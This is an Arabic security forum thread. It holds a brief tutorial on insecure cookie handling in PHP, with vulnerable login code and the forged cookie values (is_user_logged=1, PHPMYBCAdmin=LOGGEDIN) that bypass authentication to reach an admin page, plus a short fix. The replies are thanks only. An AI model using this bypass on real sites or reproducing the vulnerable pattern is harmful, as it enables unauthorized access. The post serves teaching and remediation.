1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : V!P-Hero | المشاهدات : 354 | الردود : 3
حالة الموضوع:
مغلق
  1. V!P-Hero DeveloPer Plus

    الأنتساب:
    ‏27 مارس 2012
    المشاركات:
    138
    الإعجابات المتلقاة:
    11
    نقاط الجائزة:
    50
    الإقامة:
    هنااااااك
    نظام التشغيل:
    Linux
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    اللهم صل وسلم على سيدنا محمد وعلى آله وصحبه اجمعين

    اليوم درسنا عن ثغرات

    #Insecure Cookie Handling

    الكوكيز المحمية لابد ان ترسل من خلال SSL ويكمن الاكتشاف والتخطي من خلال وضع بروكسي لمشاهدة الطلبات

    ناخذ كود بسيط عشان توضح الصورة

    [PHP CODE] if($_POST['password'] == $thepass) {
    setcookie("is_user_logged","1");
    } else { die("Login failed!"); }
    ............ etc .................
    if($_COOKIE['is_user_logged']=="1")
    { include "admin.php"; else { die('not logged'); }[/PHP CODE]

    الان لو كتبنا is_user_logged في الكوكيز وحطينا قيمتها 1 راح نتخطى التسجيل ونتحول لصفحة admin
    ناخذ كود ثاني ونشوف

    [PHP CODE] if ($_COOKIE[PHPMYBCAdmin] == '') {[/PHP CODE][PHP CODE]
    if (!$_POST[login] == 'login') {
    die("Please Login:<BR><form method=post><input type=password
    name=password><input type=hidden value=login name=login><input
    type=submit></form>");
    } elseif($_POST[password] == $bcadminpass) {
    setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
    header("Location: admin.php"); } else { die("Incorrect"); }
    }[/PHP CODE]

    الكود السابق قابل للاستغلال لو خلينا الكوكي كالتالي

    كود PHP:
    "PHPMYBCAdmin=LOGGEDIN; path=/";document.cookie "1246371700; path=/"
    طريقة الاصلاح والترقيع
    استخدام SESSIONS بدل الكوكيز
    او نقلها عبر SSL
    الى هنا ينتهي الدرس القاكم في دروس اخرى باذن الله

     
  2. ♕| s c я є α м |♕ IP: 90.148.234.7 مشرف

    الأنتساب:
    ‏23 ديسمبر 2014
    المشاركات:
    650
    الإعجابات المتلقاة:
    685
    نقاط الجائزة:
    515
    الإقامة:
    7
    نظام التشغيل:
    windows xp
    رد: ثغرات الكوكيز Insecure Cookie Handling

    يعطيك الف الف عافيـه
     
  3. M4r7h Developer

    الأنتساب:
    ‏18 مايو 2014
    المشاركات:
    17
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Perl
    رد: ثغرات الكوكيز Insecure Cookie Handling

    مشششكؤر
     
  4. coiffa Developer

    الأنتساب:
    ‏1 يناير 2013
    المشاركات:
    41
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: ثغرات الكوكيز Insecure Cookie Handling

    موضوع اكثر من رائع
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة